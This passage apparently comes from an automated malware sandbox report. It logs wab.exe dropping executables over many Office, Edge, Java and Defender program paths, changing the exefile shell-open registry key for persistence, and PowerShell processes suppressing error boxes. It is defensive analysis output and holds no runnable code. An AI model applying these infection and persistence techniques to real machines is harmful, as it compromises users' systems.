Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\OcPubMgr.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\aimgr.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.Loader.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\VPREVIEW.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\OLicenseHeartbeat.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\OLCFG.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\grv_icons.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Source Engine\OSE.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\msoasb.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pubs.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe Jump to dropped file

Boot Survival

Source: C:\Program Files (x86)\Windows Mail\wab.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command NULL
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4423
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5401
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6060
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3771
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\DATABASECOMPARE.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\PerfBoost.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\MSOHTMED.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-006E-0409-0000-0000000FF1CE}\misc.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCopyAccelerator.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\SETLANG.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\DW\DW20.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0C0A-0000-0000000FF1CE}\misc.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Windows\svchost.com
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\lync99.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\FLTLDR.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\aimgr.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\SELFCERT.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\SCANPST.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\xlicons.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\ConfigSecurityPolicy.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSREC.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exe
